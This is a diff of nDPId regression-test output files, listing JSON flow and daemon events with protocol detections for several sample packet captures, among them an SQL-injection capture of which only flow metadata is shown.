00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":94,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1499348433464,"flow_last_seen":1499348438551,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":4149,"flow_tot_l4_payload_len":4749,"flow_avg_l4_payload_len":431,"midstream":0,"thread_ts_msec":1499348519077,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36202,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}}
00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":94,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1499348467295,"flow_last_seen":1499348472302,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2021,"flow_tot_l4_payload_len":2620,"flow_avg_l4_payload_len":262,"midstream":0,"thread_ts_msec":1499348519077,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36204,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}}
00808{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":94,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1499348480992,"flow_last_seen":1499348486002,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":530,"flow_tot_l4_payload_len":1053,"flow_avg_l4_payload_len":105,"midstream":0,"thread_ts_msec":1499348519077,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36206,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}}
00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":94,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1499348494345,"flow_last_seen":1499348499355,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1840,"flow_tot_l4_payload_len":2376,"flow_avg_l4_payload_len":237,"midstream":0,"thread_ts_msec":1499348519077,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36208,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}}
00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":94,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1499348506489,"flow_last_seen":1499348511497,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1881,"flow_tot_l4_payload_len":2418,"flow_avg_l4_payload_len":241,"midstream":0,"thread_ts_msec":1499348519077,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36210,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}}
00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":94,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1499348514064,"flow_last_seen":1499348519077,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2701,"flow_tot_l4_payload_len":4749,"flow_avg_l4_payload_len":395,"midstream":0,"thread_ts_msec":1499348519077,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36212,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}}
00562{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":94,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","packets-captured":94,"packets-processed":94,"total-skipped-flows":0,"total-l4-data-len":23660,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":9,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":9,"total-idle-flows":9,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":57,"global_ts_msec":1499348519077}
~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
~~ packets captured/processed: 94/94

7934
test/results/WebattackXSS.pcap.out
View File

File diff suppressed because it is too large Load Diff

12
test/results/afp.pcap.out
View File

@@ -1,11 +1,11 @@
00454{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"afp.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0}
00540{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"afp.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1643275951277}
00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"afp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1643275951277,"flow_last_seen":1643275951277,"flow_idle_time":7440000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":1,"thread_ts_msec":1643275951277,"l3_proto":"ip4","src_ip":"192.168.27.57","dst_ip":"192.168.27.139","src_port":64987,"dst_port":548,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"afp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1643275951277,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":88,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":88,"pkt_l4_len":54,"thread_ts_msec":1643275951277,"pkt":"ABxCVgfWYPgdrn1ECABFAABKAABAAEAGgpnAqBs5wKgbi\/3bAiR+nkVXU19RioAYCHEmJgAAAQEICtTtV\/gAQrf\/AAIixgAAAAAAAAAGAAAAABEAAAIOHA=="}
00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"afp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1643275951277,"flow_last_seen":1643275951277,"flow_idle_time":7440000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":1,"thread_ts_msec":1643275951277,"l3_proto":"ip4","src_ip":"192.168.27.57","dst_ip":"192.168.27.139","src_port":64987,"dst_port":548,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"AFP","breed":"Acceptable","category":"DataTransfer"}}
00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"afp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1643275951277,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1643275951277,"pkt":"YPgdrn1EABxCVgfWCABFAAA038RAAEAGourAqBuLwKgbOQIk\/dtTX1GKfp5FbYAQVeK4OwAAAQEICgBCwzzU7Vf4"}
00531{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"afp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1643275951277,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":116,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":116,"pkt_l4_len":82,"thread_ts_msec":1643275951277,"pkt":"YPgdrn1EABxCVgfWCABFAABm38VAAEAGorfAqBuLwKgbOQIk\/dtTX1GKfp5FbYAYVeK4bQAAAQEICgBCwzzU7Vf4AQIixgAAAAAAAAAiAAAAAA4cx5MnnCmFIy+AAAAAAAAACVyxcAAAAAALpMeAAAAAEAA="}
00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":16,"source":"afp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":1643275951277,"flow_last_seen":1643275952364,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":162,"flow_avg_l4_payload_len":10,"midstream":1,"thread_ts_msec":1643275952364,"l3_proto":"ip4","src_ip":"192.168.27.57","dst_ip":"192.168.27.139","src_port":64987,"dst_port":548,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"AFP","breed":"Acceptable","category":"DataTransfer"}}
00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"afp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1643275951277,"flow_last_seen":1643275951277,"flow_idle_time":7560000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":1,"thread_ts_msec":1643275951277,"l3_proto":"ip4","src_ip":"192.168.27.57","dst_ip":"192.168.27.139","src_port":64987,"dst_port":548,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"afp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1643275951277,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":88,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":88,"pkt_l4_len":54,"thread_ts_msec":1643275951277,"pkt":"ABxCVgfWYPgdrn1ECABFAABKAABAAEAGgpnAqBs5wKgbi\/3bAiR+nkVXU19RioAYCHEmJgAAAQEICtTtV\/gAQrf\/AAIixgAAAAAAAAAGAAAAABEAAAIOHA=="}
00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"afp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1643275951277,"flow_last_seen":1643275951277,"flow_idle_time":7560000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":1,"thread_ts_msec":1643275951277,"l3_proto":"ip4","src_ip":"192.168.27.57","dst_ip":"192.168.27.139","src_port":64987,"dst_port":548,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"AFP","breed":"Acceptable","category":"DataTransfer"}}
00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"afp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1643275951277,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1643275951277,"pkt":"YPgdrn1EABxCVgfWCABFAAA038RAAEAGourAqBuLwKgbOQIk\/dtTX1GKfp5FbYAQVeK4OwAAAQEICgBCwzzU7Vf4"}
00531{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"afp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1643275951277,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":116,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":116,"pkt_l4_len":82,"thread_ts_msec":1643275951277,"pkt":"YPgdrn1EABxCVgfWCABFAABm38VAAEAGorfAqBuLwKgbOQIk\/dtTX1GKfp5FbYAYVeK4bQAAAQEICgBCwzzU7Vf4AQIixgAAAAAAAAAiAAAAAA4cx5MnnCmFIy+AAAAAAAAACVyxcAAAAAALpMeAAAAAEAA="}
00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":16,"source":"afp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":1643275951277,"flow_last_seen":1643275952364,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":162,"flow_avg_l4_payload_len":10,"midstream":1,"thread_ts_msec":1643275952364,"l3_proto":"ip4","src_ip":"192.168.27.57","dst_ip":"192.168.27.139","src_port":64987,"dst_port":548,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"AFP","breed":"Acceptable","category":"DataTransfer"}}
00547{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":16,"source":"afp.pcap","alias":"nDPId-test","packets-captured":16,"packets-processed":16,"total-skipped-flows":0,"total-l4-data-len":162,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1643275952364}
~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
~~ packets captured/processed: 16/16

48
test/results/aimini-http.pcap.out
View File

@@ -1,29 +1,29 @@
00462{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"aimini-http.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0}
00548{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"aimini-http.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1614860228394}
00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1614860229383,"flow_last_seen":1614860229383,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1614860229383,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":28501,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1614860229383,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614860229383,"pkt":"5kBKB+riApXG95NLCABFAAAwBPkAAIAGAAAKZQACCmYAAm9VAFCbu4XRAAAAAHACgAEU8QAAAgQFtAMDAQA="}
00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1614860229383,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614860229383,"pkt":"ApXG95WRWgXZu6TVCABFAAAwBPkAAH8GIgEKZQACCmYAAm9VAFCbu4XRAAAAAHACgAFeHQAAAgQFtAMDAQA="}
00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1614860229384,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614860229384,"pkt":"WgXZu6TVApXG95WRCABFAAAwBQQAAIAGAAAKZgACCmUAAgBQb1Wbu5n7m7uF0nASgAEU8QAAAgQFtAMDAQA="}
00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":12,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1614860229383,"flow_last_seen":1614860229384,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":595,"flow_tot_l4_payload_len":595,"flow_avg_l4_payload_len":99,"midstream":0,"thread_ts_msec":1614860229384,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":28501,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Aimini.HTTP","breed":"Acceptable","category":"Web"}}
00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":34,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1614860229385,"flow_last_seen":1614860229385,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1614860229385,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":28502,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":34,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1614860229385,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614860229385,"pkt":"5kBKB+riApXG95NLCABFAAAwBP8AAIAGAAAKZQACCmYAAm9WAFCbu7tlAAAAAHACgAEU8QAAAgQFtAMDAQA="}
00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":38,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1614860229386,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614860229386,"pkt":"ApXG95WRWgXZu6TVCABFAAAwBP8AAH8GIfsKZQACCmYAAm9WAFCbu7tlAAAAAHACgAEoiAAAAgQFtAMDAQA="}
00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":39,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1614860229386,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614860229386,"pkt":"WgXZu6TVApXG95WRCABFAAAwBQ0AAIAGAAAKZgACCmUAAgBQb1abu8Cxm7u7ZnASgAEU8QAAAgQFtAMDAQA="}
00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":42,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1614860229385,"flow_last_seen":1614860229386,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":524,"flow_tot_l4_payload_len":524,"flow_avg_l4_payload_len":87,"midstream":0,"thread_ts_msec":1614860229386,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":28502,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Aimini.HTTP","breed":"Acceptable","category":"Web"}}
00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":95,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1614860229388,"flow_last_seen":1614860229388,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1614860229388,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":28503,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":95,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1614860229388,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614860229388,"pkt":"5kBKB+riApXG95NLCABFAAAwBREAAIAGAAAKZQACCmYAAm9XAFCbu+drAAAAAHACgAEU8QAAAgQFtAMDAQA="}
00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":98,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1614860229389,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614860229389,"pkt":"ApXG95WRWgXZu6TVCABFAAAwBREAAH8GIekKZQACCmYAAm9XAFCbu+drAAAAAHACgAH8gAAAAgQFtAMDAQA="}
00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":99,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1614860229389,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614860229389,"pkt":"WgXZu6TVApXG95WRCABFAAAwBRkAAIAGAAAKZgACCmUAAgBQb1ebu+vKm7vnbHASgAEU8QAAAgQFtAMDAQA="}
00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":102,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1614860229388,"flow_last_seen":1614860229389,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":604,"flow_tot_l4_payload_len":604,"flow_avg_l4_payload_len":100,"midstream":0,"thread_ts_msec":1614860229389,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":28503,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Aimini.HTTP","breed":"Acceptable","category":"Web"}}
00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":119,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1614860229389,"flow_last_seen":1614860229389,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1614860229389,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":28504,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":119,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1614860229389,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614860229389,"pkt":"5kBKB+riApXG95NLCABFAAAwBRcAAIAGAAAKZQACCmYAAm9YAFCbu\/hqAAAAAHACgAEU8QAAAgQFtAMDAQA="}
00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":127,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1614860229390,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614860229390,"pkt":"ApXG95WRWgXZu6TVCABFAAAwBRcAAH8GIeMKZQACCmYAAm9YAFCbu\/hqAAAAAHACgAHrgAAAAgQFtAMDAQA="}
00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":128,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1614860229390,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614860229390,"pkt":"WgXZu6TVApXG95WRCABFAAAwBSIAAIAGAAAKZgACCmUAAgBQb1ibu\/tYm7v4a3ASgAEU8QAAAgQFtAMDAQA="}
00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":132,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1614860229389,"flow_last_seen":1614860229390,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":542,"flow_tot_l4_payload_len":542,"flow_avg_l4_payload_len":90,"midstream":0,"thread_ts_msec":1614860229390,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":28504,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Aimini.HTTP","breed":"Acceptable","category":"Web"}}
00685{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":139,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":72,"flow_first_seen":1614860229383,"flow_last_seen":1614860229388,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":60714,"flow_avg_l4_payload_len":843,"midstream":0,"thread_ts_msec":1614860229390,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":28501,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Aimini.HTTP","breed":"Acceptable","category":"Web"}}
